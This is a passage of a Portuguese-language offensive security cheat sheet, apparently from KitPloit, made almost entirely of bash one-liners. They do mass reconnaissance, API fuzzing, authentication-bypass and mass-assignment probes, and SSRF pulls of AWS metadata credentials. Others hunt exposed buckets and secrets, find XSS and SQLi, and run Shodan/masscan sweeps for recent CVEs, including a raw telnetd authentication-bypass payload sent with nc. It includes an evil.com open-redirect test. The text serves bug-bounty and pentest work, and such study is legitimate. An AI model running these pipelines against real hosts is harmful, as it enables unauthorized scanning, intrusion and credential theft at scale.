nuclei -l alive.txt -t cves/ -severity critical,high -c 30 -o cve_results.txt

Tomada de Subdomínio```bash

subfinder -d target.com -silent | httpx -silent | nuclei -t takeovers/ -c 50

root@kitploit:~
### Painéis Expostos```bash
nuclei -l alive.txt -t exposed-panels/ -c 50 | anew panels.txt

Configurações incorretas```bash

nuclei -l alive.txt -t misconfiguration/ -severity high,critical | anew misconfig.txt

root@kitploit:~
### Modo DAST```bash
nuclei -l urls.txt -dast -rl 10 -c 3 -o dast_results.txt

Tags Personalizadas```bash

nuclei -l alive.txt -tags cve,rce,sqli,xss -severity critical,high -o tagged_results.txt

root@kitploit:~
### Varredura de Rede```bash
nuclei -l ips.txt -t network/ -c 25 -o network_vulns.txt

🔌 Teste de Segurança de API

Introspeção GraphQL```bash

cat urls.txt | httpx -silent -path /graphql -mc 200 | xargs -I@ curl -s @ -H "Content-Type: application/json" -d '{"query":"{__schema{types{name}}}"}' | grep -v "error"

root@kitploit:~
### Enumeração de REST API```bash
cat alive.txt | httpx -silent -path /api/v1,/api/v2,/api/v3,/api/swagger.json -mc 200 | anew api_endpoints.txt

Análise de JWT```bash

cat urls.txt | httpx -silent | katana -d 3 -silent | grep -oE "eyJ[A-Za-z0-9_-].eyJ[A-Za-z0-9_-].[A-Za-z0-9_-]*" | anew jwts.txt

root@kitploit:~
### Vazamento de Chaves de API```bash
cat urls.txt | httpx -silent | katana -d 3 -silent | grep -oiE "(api[_-]?key|apikey|api_secret)[=:]['\"]?[a-zA-Z0-9]{16,}['\"]?" | anew api_keys.txt

Autenticação Quebrada```bash

Test endpoints without auth

cat api_endpoints.txt | httpx -silent -mc 200 -fc 401,403 | anew no_auth_endpoints.txt

root@kitploit:~
### Teste de Limitação de Taxa```bash
for i in {1..100}; do curl -s -o /dev/null -w "%{http_code}\n" "https://target.com/api/endpoint"; done | sort | uniq -c

Teste de BOLA/IDOR```bash

cat urls.txt | grep -oE "(id|user_id|account_id|uid)=[0-9]+" | sed 's/=[0-9]*/=FUZZ/' | sort -u | anew bola_candidates.txt

root@kitploit:~
### 💀 Fuzzing de Endpoints de API com ffuf```bash
# ☠️ Fuzz API endpoints with common paths and methods
ffuf -u https://target.com/api/FUZZ -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt -mc 200,201,204,301,302,401,403,405 -ac -c -t 100 -H "Content-Type: application/json" -o api_fuzz.json -of json

💀 Fuzzing de Versão de API```bash

☠️ Discover hidden API versions

ffuf -u https://target.com/api/vFUZZ/users -w <(seq 1 20) -mc 200,201,401,403 -ac -c && ffuf -u https://target.com/FUZZ/users -w <(echo -e "api\nv1\nv2\nv3\nv4\napi/v1\napi/v2\napi/v3\napi/internal\napi/private\napi/admin\napi/dev\napi/test\napi/staging\napi/beta") -mc 200,201,401,403 -ac -c

root@kitploit:~
### 💀 Fuzzing de Métodos de API REST```bash
# ☠️ Test all HTTP methods on API endpoints
cat api_endpoints.txt | while read url; do for method in GET POST PUT DELETE PATCH OPTIONS HEAD TRACE CONNECT; do CODE=$(curl -s -o /dev/null -w "%{http_code}" -X $method "$url" -H "Content-Type: application/json"); echo "$method $url - $CODE"; done; done | grep -vE " - (404|405)$" | anew api_methods.txt

💀 Fuzzing GraphQL com ffuf```bash

☠️ Fuzz GraphQL endpoints for introspection and queries

ffuf -u https://target.com/FUZZ -w <(echo -e "graphql\ngraphiql\nplayground\nconsole\nquery\ngql\nv1/graphql\nv2/graphql\napi/graphql\napi/gql") -mc 200,400 -ac -c -H "Content-Type: application/json" -d '{"query":"{__typename}"}' -X POST -o graphql_endpoints.json

root@kitploit:~
### 💀 Fuzzing de Parâmetros de API```bash
# ☠️ Discover hidden API parameters with arjun + ffuf combo
cat api_endpoints.txt | xargs -I@ -P5 arjun -u @ -m POST -oT arjun_params.txt && cat api_endpoints.txt | xargs -I@ ffuf -u @?FUZZ=test -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -mc 200,201,400,500 -ac -c -t 50 -o param_fuzz.json

💀 Fuzzing de Bypass de Autenticação de API```bash

☠️ Test auth bypass techniques on protected endpoints

cat api_endpoints.txt | while read url; do curl -s -o /dev/null -w "%{http_code} - $url\n" "$url" -H "X-Originating-IP: 127.0.0.1" -H "X-Forwarded-For: 127.0.0.1" -H "X-Remote-IP: 127.0.0.1" -H "X-Remote-Addr: 127.0.0.1" -H "X-Custom-IP-Authorization: 127.0.0.1"; done | grep "^200" | anew auth_bypass.txt

root@kitploit:~
### 💀 Fuzzing de OpenAPI/Swagger```bash
# ☠️ Find and extract endpoints from OpenAPI specs
ffuf -u https://target.com/FUZZ -w <(echo -e "swagger.json\nswagger.yaml\nopenapi.json\nopenapi.yaml\napi-docs\napi-docs.json\nswagger-ui.html\nswagger/v1/swagger.json\nv1/swagger.json\nv2/swagger.json\nv3/swagger.json\napi/swagger.json\ndocs/api\napi/docs") -mc 200 -ac -c | tee swagger_found.txt | xargs -I@ curl -s @ | jq -r '.paths | keys[]' 2>/dev/null | anew swagger_paths.txt

💀 Fuzzing de JSON de API com Nuclei```bash

☠️ Mass API fuzzing with nuclei DAST mode

cat api_endpoints.txt | httpx -silent -mc 200,201,401,403 | nuclei -dast -t dast/vulnerabilities/ -H "Content-Type: application/json" -rl 20 -c 5 -o api_nuclei_dast.txt

root@kitploit:~
### 💀 Fuzzing de Atribuição em Massa de API```bash
# ☠️ Test for mass assignment vulnerabilities
cat api_endpoints.txt | grep -iE "(user|account|profile|register|signup|update)" | xargs -I@ curl -s -X POST @ -H "Content-Type: application/json" -d '{"admin":true,"role":"admin","isAdmin":true,"is_admin":1,"privilege":"admin","access_level":9999}' -o /dev/null -w "%{http_code} - @\n" | grep -E "^(200|201|204)" | anew mass_assignment.txt

💀 API FUZZ com Geração de Wordlist Personalizada```bash

☠️ Generate API wordlist from JS files and fuzz

cat js.txt | xargs -I@ curl -s @ | grep -oE "["']/(api|v[0-9])/[a-zA-Z0-9/_-]+["']" | tr -d ""'" | sort -u > custom_api_wordlist.txt && ffuf -u https://target.com/FUZZ -w custom_api_wordlist.txt -mc 200,201,204,401,403,500 -ac -c -t 80 -H "Authorization: Bearer null" -o custom_api_fuzz.json

root@kitploit:~
## ☁️ Segurança na Nuvem

### AWS S3 Bucket Finder```bash
cat urls.txt | grep -oE "[a-zA-Z0-9.-]+\.s3\.amazonaws\.com" | anew s3_buckets.txt
cat urls.txt | grep -oE "s3://[a-zA-Z0-9.-]+" | anew s3_buckets.txt

S3 Permission Check```bash

cat s3_buckets.txt | xargs -I@ sh -c 'aws s3 ls s3://@ --no-sign-request 2>/dev/null && echo "OPEN: @"'

root@kitploit:~
### Firebase Database```bash
cat urls.txt | grep -oE "[a-zA-Z0-9-]+\.firebaseio\.com" | xargs -I@ curl -s @/.json | grep -v "null"

Azure Blob Storage```bash

cat urls.txt | grep -oE "[a-zA-Z0-9-]+.blob.core.windows.net" | anew azure_blobs.txt

root@kitploit:~
### GCP Storage```bash
cat urls.txt | grep -oE "storage\.googleapis\.com/[a-zA-Z0-9-]+" | anew gcp_buckets.txt

SSRF de Metadados AWS```bash

cat urls.txt | gf ssrf | qsreplace "http://169.254.169.254/latest/meta-data/iam/security-credentials/" | httpx -silent -ms "AccessKeyId"

root@kitploit:~
### Arquivos de Credenciais da Nuvem```bash
cat alive.txt | httpx -silent -path /.aws/credentials,/.docker/config.json,/kubeconfig -mc 200 | anew cloud_creds.txt

🤖 Scripts de Automação

Pipeline Completo de Reconhecimento```bash

#!/bin/bash domain=$1 mkdir -p $domain && cd $domain

Subdomains

subfinder -d $domain -all -silent | anew subs.txt amass enum -passive -d $domain | anew subs.txt assetfinder -subs-only $domain | anew subs.txt

Alive check

cat subs.txt | httpx -silent -threads 100 | anew alive.txt

URLs

cat alive.txt | katana -d 5 -jc -silent | anew urls.txt cat alive.txt | waybackurls | anew urls.txt cat alive.txt | gau --threads 50 | anew urls.txt

Vulnerability patterns

cat urls.txt | gf xss | anew xss.txt cat urls.txt | gf sqli | anew sqli.txt cat urls.txt | gf ssrf | anew ssrf.txt cat urls.txt | gf lfi | anew lfi.txt

Nuclei scan

nuclei -l alive.txt -t /nuclei-templates/ -severity critical,high -o vulns.txt

root@kitploit:~
### Script Caçador XSS```bash
#!/bin/bash
target=$1
echo $target | waybackurls | anew urls.txt
echo $target | gau | anew urls.txt
cat urls.txt | gf xss | uro | qsreplace '">' | airixss -payload "alert(1)" | tee xss_found.txt
cat urls.txt | gf xss | uro | dalfox pipe --silence | tee -a xss_found.txt

Script de Reconhecimento de API```bash

#!/bin/bash target=$1 mkdir -p $target/api && cd $target/api

Find API endpoints

cat ../alive.txt | httpx -silent -path /api,/api/v1,/api/v2,/swagger.json,/openapi.json | anew api_endpoints.txt

Extract from JS

cat ../js.txt | xargs -I@ curl -s @ | grep -oE "(/api/[^"'`\s<>]+)" | sort -u | anew js_api_endpoints.txt

Test GraphQL

cat ../alive.txt | httpx -silent -path /graphql,/graphiql,/playground -mc 200 | anew graphql.txt

echo "[+] API recon complete!"

root@kitploit:~
## ⚙️ Funções Bash

Adicione ao seu `.bashrc` ou `.zshrc`:```bash
# Quick recon
recon() {
    subfinder -d $1 -silent | anew subs.txt
    assetfinder -subs-only $1 | anew subs.txt
    cat subs.txt | httpx -silent | anew alive.txt
    echo "[+] Found $(wc -l < alive.txt) alive hosts"
}

# XSS scan
xscan() {
    echo $1 | waybackurls | gf xss | uro | qsreplace '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)"
}

# SQLi scan
sqscan() {
    echo $1 | waybackurls | gf sqli | uro | qsreplace "'" | httpx -silent -ms "error|syntax|mysql"
}

# JS recon
jsrecon() {
    echo $1 | waybackurls | grep -iE "\.js$" | httpx -silent | nuclei -t exposures/
}

# Nuclei quick
nuke() {
    echo $1 | httpx -silent | nuclei -t /nuclei-templates/ -severity critical,high
}

# Full pipeline
fullrecon() {
    recon $1
    cat alive.txt | katana -d 3 -jc -silent | anew urls.txt
    cat urls.txt | gf xss | anew xss.txt
    cat urls.txt | gf sqli | anew sqli.txt
    nuclei -l alive.txt -t /nuclei-templates/ -severity critical,high -o vulns.txt
}

# Certificate search
cert() {
    curl -s "https://crt.sh/?q=%25.$1&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u
}

# Parameter extraction
params() {
    echo $1 | waybackurls | grep "=" | uro | unfurl keys | sort -u
}

# Subdomain takeover check
takeover() {
    subfinder -d $1 -silent | httpx -silent | nuclei -t takeovers/ -c 50
}

# Port scan
portscan() {
    naabu -host $1 -top-ports 1000 -silent | httpx -silent | anew $1_ports.txt
}

# Screenshot all
screenshot() {
    cat $1 | xargs -I@ gowitness single @ -o screenshots/
}

🆕 Novos Oneliners 2026

⚡🔥⚡ TelnetPwn - CVE-2026-24061 (CVSS 9.8 - CRÍTICO) ⚡🔥⚡

💀 GNU InetUtils Telnetd - Bypass de Autenticação - Shell Root Instantâneo! Em Exploração Ativa! 💀

⚡ 1. Descoberta em Massa de Telnet via Shodan```bash

💀 Find exposed telnet servers worldwide

shodan search "port:23 telnet" --fields ip_str,port,org | awk '{print $1":"$2}' | anew telnet_targets.txt

root@kitploit:~
#### ⚡ 2. Nmap Detecção de Serviço Telnet + Versão```bash
# 💀 Enumerate telnet services with version detection
nmap -p23 -sV --script=telnet-ntlm-info -iL targets.txt -oG - | grep "23/open" | awk '{print $2}' | anew telnet_open.txt

⚡ 3. Varredura Rápida de Telnet com Masscan```bash

💀 Ultra-fast telnet port discovery on large ranges

masscan -p23 --rate=10000 -iL ip_ranges.txt -oG masscan_telnet.txt && cat masscan_telnet.txt | grep "23/open" | awk '{print $4}' | anew telnet_alive.txt

root@kitploit:~
#### ⚡ 4. GNU InetUtils Telnetd Fingerprint```bash
# 💀 Identify GNU inetutils-telnetd specifically (vulnerable)
cat telnet_targets.txt | xargs -P30 -I@ sh -c 'echo "" | timeout 3 nc -v @ 23 2>&1 | grep -qi "GNU\|inetutils\|Ubuntu\|Debian" && echo "[GNU TELNETD] @"' | tee gnu_telnetd.txt

⚡ 5. CVE-2026-24061 Verificação de Vulnerabilidade (Segura)```bash

💀 Test for NEW_ENVIRON option support (vuln indicator)

cat telnet_targets.txt | xargs -P20 -I@ sh -c 'echo -e "\xff\xfa\x27\x00\x00USER\x01-f\xff\xf0" | timeout 3 nc @ 23 2>/dev/null | grep -q "login|root|#" && echo "[CVE-2026-24061 POTENTIAL] @"' | tee cve_2026_24061_potential.txt

root@kitploit:~
#### ⚡ 6. Nuclei CVE-2026-24061 Scanner```bash
# 💀 Mass scan with Nuclei template
cat telnet_targets.txt | nuclei -t http/cves/2026/CVE-2026-24061.yaml -c 50 -o cve_2026_24061_vuln.txt

⚡ 7. Captura de Banner + Extração de Versão```bash

💀 Extract telnet banners for version analysis

cat telnet_targets.txt | xargs -P50 -I@ sh -c 'echo "" | timeout 3 nc @ 23 2>&1 | head -3' | tee telnet_banners.txt | grep -iE "(inetutils|GNU|2.[0-7])" | anew potentially_vuln_versions.txt

root@kitploit:~
#### ⚡ 8. Subnet Telnet Hunter```bash
# 💀 Discover telnet in internal/external subnets
prips 192.168.0.0/16 | xargs -P100 -I@ sh -c 'timeout 1 nc -zv @ 23 2>&1 | grep -q "succeeded\|open" && echo @' | anew internal_telnet.txt

⚡ 9. Correlação de Telnet + Impressão Digital do SO```bash

💀 Correlate telnet with vulnerable OS (Debian/Ubuntu/Kali)

nmap -p23 -sV -O --script=telnet-encryption -iL telnet_targets.txt -oX telnet_scan.xml && cat telnet_scan.xml | grep -oE "(Debian|Ubuntu|Kali|Linux)" | sort | uniq -c | sort -rn

root@kitploit:~
#### ⚡ 10. Pipeline de Reconhecimento Completo para CVE-2026-24061```bash
# 💀 Complete telnet vulnerability assessment pipeline
TARGET_RANGE="192.168.1.0/24"; mkdir -p telnet_recon && cd telnet_recon; masscan -p23 --rate=5000 $TARGET_RANGE -oG masscan.txt; cat masscan.txt | grep "23/open" | awk '{print $4}' > telnet_hosts.txt; cat telnet_hosts.txt | xargs -P30 -I@ sh -c 'echo "" | timeout 3 nc @ 23 2>&1 | head -5' > banners.txt; grep -liE "(GNU|inetutils|ubuntu|debian)" banners.txt | xargs -I@ basename @ .txt > gnu_telnetd_hosts.txt; echo "[+] Found $(wc -l < telnet_hosts.txt) telnet | $(wc -l < gnu_telnetd_hosts.txt) GNU inetutils (potentially vulnerable)"

⚠️ Afetado: GNU InetUtils telnetd 1.9.3 - 2.7 (Debian/Ubuntu/Kali/Trisquel) ✅ Correção: Atualize para GNU InetUtils 2.8+ ou desative o telnetd e use SSH


⚡🔥⚡ Ni8mare - CVE-2026-21858 (CVSS 10.0 - CRÍTICO) ⚡🔥⚡

💀 RCE Crítico Não Autenticado no n8n Workflow Automation - mais de 100.000 servidores afetados! Adicionado ao CISA KEV 💀

⚡ Detectar Instâncias n8n (Shodan/Censys)```bash

shodan search "n8n" --fields ip_str,port,hostnames | awk '{print "https://"$1":"$2}' | httpx -silent | anew n8n_targets.txt

root@kitploit:~
#### ⚡ Impressão digital de instalações n8n```bash
cat alive.txt | httpx -silent -match-string "n8n" -match-string "workflow" -title | grep -i "n8n" | anew n8n_instances.txt

⚡ Verifique Endpoints de Webhook Vulneráveis```bash

cat n8n_targets.txt | xargs -I@ -P20 sh -c 'curl -s -o /dev/null -w "%{http_code}" -X POST @/webhook-test/test -H "Content-Type: multipart/form-data" 2>/dev/null | grep -qE "^(200|400|500)$" && echo "POTENTIAL: @"' | tee n8n_webhook_check.txt

root@kitploit:~
#### ⚡ Detecção de Confusão de Content-Type```bash
curl -s -X POST "https://target.com/webhook/ID" -H "Content-Type: application/json" --data '{"test":1}' -w "\n%{http_code}" | tail -1 | grep -qE "^(200|400)$" && echo "Webhook accepts requests"

⚡ Detecção em Massa de Versões do n8n```bash

cat n8n_targets.txt | httpx -silent -path /rest/settings -match-regex '"versionCli":"[0-9]+.[0-9]+.[0-9]+"' | anew n8n_versions.txt

root@kitploit:~
#### ⚡ Nuclei Template Check para CVE-2026-21858```bash
nuclei -l n8n_targets.txt -t http/cves/2026/CVE-2026-21858.yaml -c 30 -o ni8mare_vuln.txt

⚠️ Afetado: n8n < 1.121.0 | ✅ Correção: Atualize para n8n 1.121.0+


⚡🔥⚡ N8n Auth RCE - CVE-2026-21877 (CVSS 10.0 - CRÍTICO) ⚡🔥⚡

💀 RCE Autenticado via Git Node no n8n - Cloud & Self-hosted afetados! 💀

⚡ Detectar Instâncias com Git Node Habilitado```bash

cat n8n_targets.txt | httpx -silent -path /rest/node-types -match-string "git" | anew n8n_git_enabled.txt

root@kitploit:~
#### ⚡ Verificar Endpoints de Autenticação do n8n```bash
cat n8n_targets.txt | httpx -silent -path /rest/login -mc 200,401 -title | anew n8n_auth_endpoints.txt

⚠️ Afetado: n8n < 1.121.3 | ✅ Correção: Atualizar para n8n 1.121.3+


⚡🔥⚡ D-Link DSL RCE - CVE-2026-0625 (CVSS 9.3 - CRÍTICO) ⚡🔥⚡

💀 Injeção de Comandos em Roteadores D-Link DSL Legados - Sob exploração ativa! 💀

⚡ Shodan Dork para Roteadores D-Link DSL```bash

shodan search "D-Link DSL" --fields ip_str,port | awk '{print $1":"$2}' | httpx -silent | anew dlink_dsl_targets.txt

root@kitploit:~
#### ⚡ Detectar Endpoint dnscfg.cgi Vulnerável```bash
cat dlink_dsl_targets.txt | httpx -silent -path /dnscfg.cgi -mc 200,401 | anew dlink_dnscfg.txt

⚡ Fingerprint em Massa de D-Link```bash

cat alive.txt | httpx -silent -match-string "D-Link" -match-string "DSL" -title -tech-detect | anew dlink_routers.txt

root@kitploit:~
> **⚠️ Afetados:** Roteadores D-Link DSL Gateway Legados (EOL) | **✅ Correção:** Substitua por dispositivos suportados

---

### ⚡🔥⚡ Veeam Backup RCE - CVE-2025-59470 (CVSS 9.0 - CRÍTICO) ⚡🔥⚡

> **💀 RCE via Injeção de Parâmetros Postgres no Veeam Backup & Replication 💀**

#### ⚡ Detectar Servidores de Backup Veeam```bash
shodan search "Veeam" --fields ip_str,port | awk '{print "https://"$1":"$2}' | httpx -silent | anew veeam_targets.txt

⚡ Identificar Instâncias Veeam```bash

cat alive.txt | httpx -silent -match-string "Veeam" -title -tech-detect | grep -i "veeam" | anew veeam_instances.txt

root@kitploit:~
> **⚠️ Afetado:** Veeam B&R 13.0.1.180 e anteriores | **✅ Correção:** Atualizar para 13.0.1.1071+

---

### ⚡🔥⚡ Grafana Ghost XSS - CVE-2025-4123 (ALTA SEVERIDADE) ⚡🔥⚡

> **💀 XSS Zero-Day no Grafana - 46,500+ instâncias ainda vulneráveis! Roubo de conta possível 💀**

#### ⚡ Encontrar Instâncias do Grafana```bash
shodan search "Grafana" --fields ip_str,port,hostnames | awk '{print "https://"$1":"$2}' | httpx -silent | anew grafana_targets.txt

⚡ Detectar Versão do Grafana```bash

cat grafana_targets.txt | httpx -silent -path /api/frontend/settings -match-regex '"version":"[0-9]+.[0-9]+.[0-9]+"' | anew grafana_versions.txt

root@kitploit:~
#### ⚡ Verificar Redirecionamento Aberto (vetor CVE-2025-4123)```bash
cat grafana_targets.txt | xargs -I@ sh -c 'curl -sI "@/login?redirect=//" 2>/dev/null | grep -i "location" && echo "CHECK: @"' | tee grafana_redirect_check.txt

⚡ Detecção em massa de página de login do Grafana```bash

cat alive.txt | httpx -silent -path /login -match-string "Grafana" -title | anew grafana_logins.txt

root@kitploit:~
> **⚠️ Afetados:** Múltiplas versões do Grafana | **✅ Correção:** Atualizar para a versão corrigida mais recente

---

### ⚡🔥⚡ Caça a Subdomínios CVE-2026 - Pipeline de Detecção em Massa ⚡🔥⚡

> **💀 10 Oneliners para caçar vulnerabilidades CVE-2026 em subdomínios em escala! 💀**

#### ⚡ 1. Pipeline Completo de Caça a Subdomínios CVE-2026 (n8n + Grafana + D-Link)```bash
subfinder -d target.com -silent | httpx -silent -title -tech-detect | tee alive_subs.txt | while read line; do echo "$line" | grep -qiE "(n8n|grafana|d-link)" && echo "[CVE-2026 TARGET] $line"; done | anew cve2026_targets.txt

⚡ 2. Detecção em Massa de CVE-2026-21858 em Subdomínios do n8n```bash

subfinder -d target.com -silent | httpx -silent | xargs -I@ -P30 sh -c 'curl -s "@/rest/settings" 2>/dev/null | grep -q "versionCli" && echo "[N8N FOUND] @"' | tee n8n_subs.txt | xargs -I@ nuclei -u @ -t http/cves/2026/CVE-2026-21858.yaml -silent

root@kitploit:~
#### ⚡ 3. CVE-2026-21877 n8n Git Node RCE Subdomain Scanner```bash
cat subdomains.txt | httpx -silent | xargs -I@ -P20 sh -c 'curl -s "@/rest/node-types" 2>/dev/null | grep -qi "git" && curl -s "@/rest/settings" 2>/dev/null | grep -qE "versionCli.*1\.(([0-9]|[0-9][0-9]|1[01][0-9]|120)\.[0-9]+)" && echo "[CVE-2026-21877 VULN] @"' | anew n8n_git_vuln.txt

⚡ 4. Grafana CVE-2025-4123 XSS + Open Redirect Subdomain Hunt```bash

subfinder -d target.com -silent | httpx -silent -path /api/frontend/settings -match-regex '"version":"' | tee grafana_subs.txt | xargs -I@ -P15 sh -c 'curl -sI "@/login?redirect=//evil.com" 2>/dev/null | grep -qi "location.*evil" && echo "[CVE-2025-4123 VULN] @"'

root@kitploit:~
#### ⚡ 5. Multi-CVE-2026 Scanner com Nuclei (Parallel Templates)```bash
subfinder -d target.com -silent | httpx -silent | nuclei -tags cve2026 -severity critical,high -c 50 -o cve2026_nuclei_results.txt

⚡ 6. Subdomínio n8n Webhook Fingerprint + Verificação de CVE-2026-21858```bash

cat subdomains.txt | httpx -silent | xargs -I@ -P25 sh -c 'for path in /webhook /webhook-test /rest/workflows; do curl -s -o /dev/null -w "%{http_code}" "@$path" 2>/dev/null | grep -qE "^(200|401|403)$" && echo "[N8N ENDPOINT] @$path" && break; done' | anew n8n_webhooks.txt

root@kitploit:~
#### ⚡ 7. CVE-2026 Busca de IoT/Roteadores (D-Link DSL + Outros Roteadores)```bash
subfinder -d target.com -silent | httpx -silent -title -tech-detect | grep -iE "(d-link|router|gateway|modem|dsl)" | tee router_subs.txt | xargs -I@ -P10 sh -c 'curl -s "@/dnscfg.cgi" 2>/dev/null | grep -qi "dns" && echo "[CVE-2026-0625 POTENTIAL] @"'

⚡ 8. Veeam CVE-2025-59470 Detecção de Subdomínios```bash

subfinder -d target.com -silent | httpx -silent -title -tech-detect | grep -i "veeam" | tee veeam_subs.txt | xargs -I@ -P10 sh -c 'curl -s "@/api/v1/version" 2>/dev/null | grep -qE "13.0.[01].[0-9]+" && echo "[CVE-2025-59470 VULN] @"'

root@kitploit:~
#### ⚡ 9. Extrator Combinado de Fingerprint e Versão para CVE-2026```bash
subfinder -d target.com -silent | httpx -silent -json | jq -r 'select(.technologies != null) | "\(.url) \(.technologies[])"' | grep -iE "(n8n|grafana|veeam|next)" | while read url tech; do echo "[CVE-2026 CHECK] $url - $tech"; done | anew cve2026_tech_fingerprint.txt

⚡ 10. Script Completo de Automação de Reconhecimento para CVE-2026```bash

domain="target.com"; mkdir -p recon_$domain && cd recon_$domain && subfinder -d $domain -silent | httpx -silent -title -tech-detect -json -o httpx_out.json && cat httpx_out.json | jq -r '.url' | nuclei -t ~/nuclei-templates/http/cves/2026/ -c 30 -o cve2026_vulns.txt && echo "[+] Found $(wc -l < cve2026_vulns.txt) CVE-2026 vulnerabilities!"

root@kitploit:~
> **🎯 Dica Profissional:** Combine com `notify` para receber alertas em tempo real: `... | notify -silent -provider slack`

---

### ⚡🔥⚡ Pipeline Avançado de Reconhecimento - Edição 2026 ⚡🔥⚡

> **🎯 10 Oneliners de Elite para reconhecimento abrangente - Enumeração multi-fonte, descoberta de ASN, análise de JS e muito mais! 🎯**

#### ⚡ 1. Descoberta de Subdomínios Multi-Fonte + Identificação Tecnológica```bash
subfinder -d target.com -all -silent | anew subs.txt && assetfinder --subs-only target.com | anew subs.txt && amass enum -passive -norecursive -noalts -d target.com | anew subs.txt && cat subs.txt | httpx -silent -threads 200 -tech-detect -status-code -title -o alive_with_tech.txt

Combina Subfinder + Assetfinder + Amass para máxima cobertura de subdomínios, depois valida com httpx + fingerprinting de tecnologia

⚡ 2. Enumeração ASN + Descoberta de DNS Reverso```bash

echo "target.com" | dnsx -silent -resp-only -a | xargs -I{} whois -h whois.cymru.com {} | awk '{print $1}' | grep -E "AS[0-9]+" | xargs -I{} sh -c 'whois -h whois.radb.net -- "-i origin {}" | grep -Eo "([0-9.]+){4}/[0-9]+"' | mapcidr -silent | dnsx -silent -ptr -resp-only | anew asn_discovered_hosts.txt

root@kitploit:~
> Descobre ASN, enumera blocos de IP, realiza DNS reverso para encontrar subdomínios ocultos

#### ⚡ 3. Pipeline de Descoberta de URL (Wayback + GAU + Katana)```bash
cat alive.txt | xargs -P 50 -I{} sh -c 'echo {} | waybackurls & echo {} | gau --threads 10 --blacklist png,jpg,gif,svg,woff,ttf & echo {} | katana -d 3 -jc -kf all -silent' | uro | anew all_urls.txt

Coleta paralela de URLs do Wayback Machine, Common Crawl, AlienVault + rastreamento ativo com deduplicação inteligente

⚡ 4. Análise Profunda de JavaScript + Secret Scanner```bash

cat alive.txt | katana -silent -em js,json -jc -d 2 | httpx -silent -mc 200 | tee js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} | tee /tmp/js_$$.tmp | grep -oE "(api_key|apikey|api-key|secret|token|password|aws_access|AKIA[0-9A-Z]{16})" && cat /tmp/js_$$.tmp | grep -oE "/(api|v[0-9]|admin|internal)/[a-zA-Z0-9_/?=&-]+" | sort -u' | anew js_secrets_and_endpoints.txt

root@kitploit:~
> Encontra arquivos JS, extrai segredos codificados (chaves de API, tokens, chaves AWS) e endpoints de API ocultos

#### ⚡ 5. Transparência de Certificados + Ataque de Permutação de Subdomínios```bash
curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u | tee crt_subs.txt | dnsgen - | shuffledns -d target.com -r /usr/share/wordlists/resolvers.txt -silent -o permuted_subs.txt && cat permuted_subs.txt | httpx -silent -o alive_permuted.txt

Enumeração de logs CT + permutação inteligente (api → api-dev, api-staging) com resolução em massa de DNS

⚡ 6. Descoberta de Portas + Serviços Web em Portas Não Padrão```bash

cat subs.txt | naabu -silent -top-ports 1000 -exclude-cdn -c 50 | sed 's/:/ /g' | awk '{print $1":"$2}' | httpx -silent -probe -status-code -title -tech-detect -follow-redirects -random-agent -o ports_with_web_services.txt

root@kitploit:~
> Varredura rápida de portas + descobre aplicativos web rodando em portas incomuns (8080, 8443, 3000, etc)

#### ⚡ 7. GitHub Dorking Automation para Organização Alvo```bash
ORG="target"; for dork in "org:$ORG password" "org:$ORG api_key" "org:$ORG secret" "org:$ORG token" "org:$ORG aws_access" "org:$ORG credentials"; do echo "[+] Searching: $dork"; gh search repos "$dork" --limit 100 | grep "^$ORG" | tee -a github_secrets.txt; sleep 2; done

Dorking automatizado no GitHub para exposição de segredos, credenciais e dados sensíveis

⚡ 8. Descoberta de Armazenamento em Nuvem (S3 + Azure + GCP)```bash

cat all_urls.txt | grep -oE '(s3.amazonaws.com/[a-zA-Z0-9.-]+|[a-zA-Z0-9.-]+.s3.amazonaws.com|storage.googleapis.com/[a-zA-Z0-9.-]+|[a-zA-Z0-9.-]+.blob.core.windows.net)' | sort -u | tee cloud_buckets.txt | xargs -I{} sh -c 'curl -sI https://{} | grep -q "200|403" && echo "[+] {} - Accessible"'

root@kitploit:~
> Extrai e valida buckets de armazenamento em nuvem mal configurados a partir de URLs coletadas

#### ⚡ 9. Descoberta de Parâmetros + Correspondência de Padrões de Vulnerabilidade```bash
cat all_urls.txt | uro | grep "=" | unfurl keys | sort -u | tee all_params.txt && cat all_urls.txt | gf xss | tee xss_params.txt && cat all_urls.txt | gf ssrf | tee ssrf_params.txt && cat all_urls.txt | gf sqli | tee sqli_params.txt && cat all_urls.txt | gf redirect | tee redirect_params.txt

Extrai parâmetros únicos e categoriza por tipo de vulnerabilidade (XSS, SSRF, SQLi, Redirect)

⚡ 10. Monitor de Reconhecimento Contínuo (Cron-Ready)```bash

DOMAIN="target.com"; DATE=$(date +%Y%m%d); mkdir -p recon_$DATE; cd recon_$DATE; subfinder -d $DOMAIN -all -silent | anew subs_$DATE.txt; cat subs_$DATE.txt | httpx -silent -threads 200 -o alive_$DATE.txt; cat alive_$DATE.txt | nuclei -t exposures/ -silent -o new_exposures_$DATE.txt; diff ../recon_$(date -d "yesterday" +%Y%m%d)/subs_*.txt subs_$DATE.txt 2>/dev/null | grep ">" | awk '{print $2}' > new_subs_$DATE.txt; [ -s new_subs_$DATE.txt ] && notify -silent -bulk < new_subs_$DATE.txt

root@kitploit:~
> Pipeline de recon persistente completo - detecta novos ativos diariamente e envia notificações

> **🎯 Dica Profissional:** Execute o oneliner #10 via cron para monitoramento 24/7: `0 */6 * * * /path/to/recon_monitor.sh`

---

### ⚡🔥⚡ Extração de Endpoints JavaScript - Técnicas Elite 2026 ⚡🔥⚡

> **🎯 10 Oneliners para extrair endpoints, segredos e APIs ocultas de arquivos JavaScript! 🎯**

#### ⚡ 1. Descoberta em Massa de Arquivos JS + Pipeline de Download```bash
cat alive.txt | katana -silent -em js -jc -d 3 | grep -E "\.js(\?|$)" | httpx -silent -mc 200 -content-length | awk '$NF > 500 {print $1}' | anew js_files.txt && cat js_files.txt | xargs -P 30 -I{} sh -c 'curl -sk {} -o js_downloaded/$(echo {} | md5sum | cut -d" " -f1).js 2>/dev/null'

Descobre todos os arquivos JS com o Katana, filtra por tamanho (>500 bytes), baixa para análise offline

⚡ 2. Extrair Todos os Endpoints de API dos Arquivos JS```bash

